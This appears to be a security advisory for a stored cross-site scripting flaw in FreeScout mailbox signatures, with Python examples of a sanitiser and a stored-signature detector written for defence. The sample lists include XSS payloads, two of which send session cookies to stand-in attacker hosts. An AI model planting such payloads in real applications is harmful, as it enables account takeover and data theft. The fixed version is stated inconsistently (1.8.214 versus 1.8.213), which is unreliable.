Platform
php
Component
freescout-help-desk
Fixed in
1.8.214
CVE-2026-40568 describes a stored cross-site scripting (XSS) vulnerability discovered in FreeScout, a free self-hosted help desk and shared mailbox application. This vulnerability allows attackers to inject malicious scripts into mailbox signatures, potentially leading to account compromise and data theft. The issue affects versions 1.0.0 through 1.8.212, and a patch is available in version 1.8.213.
The vulnerability allows an attacker who can edit a mailbox signature to store arbitrary JavaScript that executes in the browser of every other user to whom that signature is rendered. The payload can steal session cookies, redirect users to attacker-controlled sites or deface the FreeScout interface; successful exploitation can lead to account takeover, data theft and further compromise of the deployment. The root cause is that Helper::stripDangerousTags() does not robustly sanitize HTML tags and event-handler attributes, so elements such as <img>, <svg> and <details> can be injected carrying malicious event attributes (for example onerror, onload or ontoggle).
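To make the failure class concrete, the following added example (written for this page, not FreeScout's code) contrasts a hypothetical attribute-blind tag blocklist with an allowlist sanitiser. The function naive_strip_dangerous_tags() is a reconstruction of the pattern described above, not a copy of Helper::stripDangerousTags(); the payloads are constructed samples of the img/svg/details handlers the advisory names, plus a javascript: URL and an entity-obfuscated variant.

```python
"""Attribute-blind tag blocklist versus an allowlist sanitiser for help-desk
signature HTML.

Added illustration for this advisory, not FreeScout's code: the function
naive_strip_dangerous_tags() is a hypothetical reconstruction of the failure
class (blocked elements are removed, but event-handler attributes on permitted
elements are never inspected) and is not a copy of Helper::stripDangerousTags().
All payloads below are constructed samples.
"""
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample payloads: the element/handler pairs the advisory names,
# a javascript: URL, a <script> element and an entity-obfuscated scheme.
SAMPLE_PAYLOADS = [
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    '<svg onload="alert(document.domain)"></svg>',
    '<details open ontoggle="alert(1)">x</details>',
    '<a href="javascript:alert(1)">support</a>',
    '<script>alert(1)</script><b>Kind regards</b>',
    '<a href="java&#9;script:alert(1)">demo</a>',
]

_BLOCKED_ELEMENT = re.compile(r"<\s*/?\s*(script|iframe|object|embed)\b[^>]*>", re.IGNORECASE)


def naive_strip_dangerous_tags(html):
    """Hypothetical blocklist sanitiser: removes a few element names but leaves
    every attribute of the remaining elements, including on* handlers, intact."""
    return _BLOCKED_ELEMENT.sub("", html)


# Allowlist sanitiser: only these elements and attributes survive. Unknown
# elements are dropped but their text is kept, except inside script/style.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "u", "p", "br", "img", "span", "div", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
VOID_TAGS = {"br", "img"}
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")


def _safe_url(value):
    """Accept relative URLs and http/https/mailto; reject javascript:, data:,
    vbscript: and the rest. Control and whitespace characters are stripped first
    because browsers ignore them inside a scheme ('java\\tscript:' still runs)."""
    v = re.sub(r"[\x00-\x20]", "", value or "").lower()
    m = _SCHEME.match(v)
    return m is None or m.group(1) in ("http", "https", "mailto")


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._suppress = 0  # > 0 while inside <script>/<style>: their text is dropped too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._suppress += 1
            return
        if self._suppress or tag not in ALLOWED_TAGS:
            return  # element not allowlisted: drop the tag, keep its text
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # every on* handler and every non-allowlisted attribute goes
            if name in ("href", "src") and not _safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        if tag in ("script", "style"):
            return  # <script/> has no body to suppress
        self.handle_starttag(tag, attrs)
        if not self._suppress and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._suppress = max(0, self._suppress - 1)
        elif not self._suppress and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._suppress:
            self.out.append(escape(data, quote=False))  # re-encode text so it cannot form markup


def sanitize_signature(html):
    """Return signature HTML reduced to the allowlist, with all handlers removed."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for payload in SAMPLE_PAYLOADS:
        print("blocklist :", naive_strip_dangerous_tags(payload))
        print("allowlist :", sanitize_signature(payload))
        print()
```

Run as a script, the blocklist column shows the <img>/<svg>/<details> payloads passing through untouched while the allowlist column keeps only `<img src="x">`, the bare text, and `<a>` without its javascript: href. The design point is that the decision is made per attribute on an allowlist, never by matching element names, and that URL attributes are normalised before their scheme is checked.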
CVE-2026-40568 was publicly disclosed on 2026-04-21. Currently, there are no known public exploits or active campaigns targeting this vulnerability. The vulnerability is not listed on the CISA KEV catalog. While a proof-of-concept is likely possible given the nature of the XSS vulnerability, no public POCs have been reported as of the disclosure date.
Organizations using FreeScout for help desk and shared mailbox management are at risk, including businesses of all sizes and in particular those running self-hosted deployments. Because the payload executes in the browser of whoever views the signature, the agents and administrators working in the affected mailbox are the direct targets. Shared hosting environments with several FreeScout instances on one server deserve extra caution, as the compromise of one instance could potentially impact the others.
• composer / self-hosted install (the installed release is recorded as 'version' in config/app.php):
grep -n "'version'" /var/www/freescout/config/app.php
• generic web (check whether a Content-Security-Policy header is sent; without one a stored payload runs unconstrained):
curl -sI https://your-freescout-instance/mailboxes/signatures/new | grep -i content-security-policy
Disclosure
Exploit status
EPSS
0.03% (10th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-40568 is to upgrade FreeScout to version 1.8.213 or later without delay. If upgrading is not immediately feasible, a Web Application Firewall (WAF) rule that blocks requests carrying event-handler attributes or suspicious HTML tags in the mailbox signature field reduces exposure, but treat it as a stop-gap only: pattern-based rules are routinely bypassed with alternative encodings and unusual attribute syntax. Review and sanitize all user-supplied HTML in the application with an allowlist of tags and attributes rather than a blocklist, and after upgrading also review signatures saved while a vulnerable version was in use, since an upgrade does not by itself guarantee that previously stored content is re-sanitized. Monitor FreeScout logs for unusual activity or attempts to inject malicious code.
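For the post-upgrade review of already-stored signatures, the following added example (written for this page, not FreeScout's code) triages exported signature HTML for XSS indicators. The row shape (id, name, signature, mirroring a hypothetical `mailboxes` table export) and the sample rows are constructed assumptions. It is a detector for incident response, not a sanitiser: an empty result does not prove a signature is safe.

```python
"""Triage stored signatures for XSS indicators after patching.

Added example for this advisory, not FreeScout's code. It assumes signature
HTML has been exported from the application's database; the row shape used
here (id, name, signature, mirroring a hypothetical `mailboxes` table) is an
assumption. The check is a detector for incident response, not a sanitiser:
an empty result does not prove a signature is safe.
"""
import re
from html.parser import HTMLParser

# Constructed sample rows standing in for an export of stored signatures.
SAMPLE_ROWS = [
    {"id": 1, "name": "Support", "signature": "<p>Best regards,<br>Support Team</p>"},
    {"id": 2, "name": "Billing",
     "signature": '<p>Billing</p><img src="x" onerror="fetch(\'//evil.example/?c=\'+document.cookie)">'},
    {"id": 3, "name": "Sales", "signature": '<a href="JaVa&#x09;ScRiPt:alert(1)">Book a demo</a>'},
    {"id": 4, "name": "Ops", "signature": "<details open ontoggle=alert(1)>status</details>"},
]

# Elements that rarely belong in an e-mail signature but are common XSS
# carriers, attributes that take a URL, and URL schemes that execute code.
RISKY_TAGS = {"script", "svg", "math", "details", "iframe", "object", "embed", "form", "style", "base"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data"}
RISKY_SCHEMES = ("javascript:", "vbscript:", "data:")


class IndicatorCollector(HTMLParser):
    """Records event-handler attributes, risky elements and script-bearing URLs."""

    def __init__(self):
        super().__init__()
        self.indicators = set()

    def handle_starttag(self, tag, attrs):
        if tag in RISKY_TAGS:
            self.indicators.add("tag:%s" % tag)
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):
                self.indicators.add("handler:%s" % name)
            elif name in URL_ATTRS:
                # HTMLParser has already decoded entities such as &#x09;; now drop
                # the control/whitespace characters browsers ignore inside a scheme.
                url = re.sub(r"[\x00-\x20]", "", value or "").lower()
                if url.startswith(RISKY_SCHEMES):
                    self.indicators.add("url:%s=%s" % (name, url.split(":", 1)[0]))

    handle_startendtag = handle_starttag  # self-closing tags get the same checks


def audit_signatures(rows):
    """Return one finding per row carrying at least one indicator."""
    findings = []
    for row in rows:
        collector = IndicatorCollector()
        collector.feed(row["signature"])
        collector.close()
        if collector.indicators:
            findings.append({"id": row["id"], "name": row["name"],
                             "indicators": sorted(collector.indicators)})
    return findings


if __name__ == "__main__":
    for finding in audit_signatures(SAMPLE_ROWS):
        print("mailbox %(id)s (%(name)s): %(indicators)s" % finding)
```

Running the script reports mailboxes 2, 3 and 4 with the handler, obfuscated javascript: URL and <details> element respectively, while the plain signature in row 1 is silent. Any flagged row should be replaced with a clean signature and the account that last edited it treated as a suspect in the incident.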
Update FreeScout to version 1.8.213 or later to fix the XSS vulnerability. This version corrects the HTML sanitization of mailbox signatures by removing dangerous event-handler attributes and ensuring that only safe HTML tags are allowed.
CVE-2026-40568 is a stored cross-site scripting (XSS) vulnerability in FreeScout versions 1.0.0 through 1.8.212, allowing attackers to inject malicious scripts via mailbox signatures.
You are affected if you are running FreeScout versions 1.0.0 through 1.8.212. Verify your version and upgrade immediately if vulnerable.
Upgrade FreeScout to version 1.8.213 or later to resolve the vulnerability. Consider WAF rules as a temporary mitigation.
As of the current disclosure date, there are no confirmed reports of active exploitation, but the vulnerability's ease of exploitation warrants caution.
Refer to the FreeScout security advisory on their official website or GitHub repository for detailed information and updates.